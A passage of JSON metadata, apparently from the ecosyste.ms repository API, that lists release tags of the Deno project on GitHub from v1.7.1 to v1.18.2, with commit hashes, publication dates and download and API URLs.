1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.